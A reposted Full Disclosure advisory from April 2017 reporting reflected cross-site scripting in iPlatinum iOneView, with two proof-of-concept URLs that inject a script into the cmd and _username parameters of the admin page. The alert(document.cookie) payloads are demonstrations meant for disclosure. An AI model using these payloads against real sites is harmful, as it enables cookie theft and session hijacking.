Full Disclosure

iPlatinum iOneView Multiple Parameter Reflected XSS

April 4, 2017 007admin Leave a comment

Posted by Patrick Webster via Fulldisclosure on Apr 04

https://www.osisecurity.com.au/iplatinum-ioneview-multiple-parameter-reflected-xss.html

Date:
04-Apr-2017

Product:
iPlatinum iOneView

Versions affected:
Unknown.

Vulnerabilities:

1) Cross-site scripting:

http://[target]/ioneview/admin/main.pl?cmd=<script>alert(document.cookie)</script>
http://[target]/ioneview/admin/main.pl?_username="><script>alert(document.cookie)</script>…

Leave a Reply Cancel reply

You must be logged in to post a comment.

Software and Security Information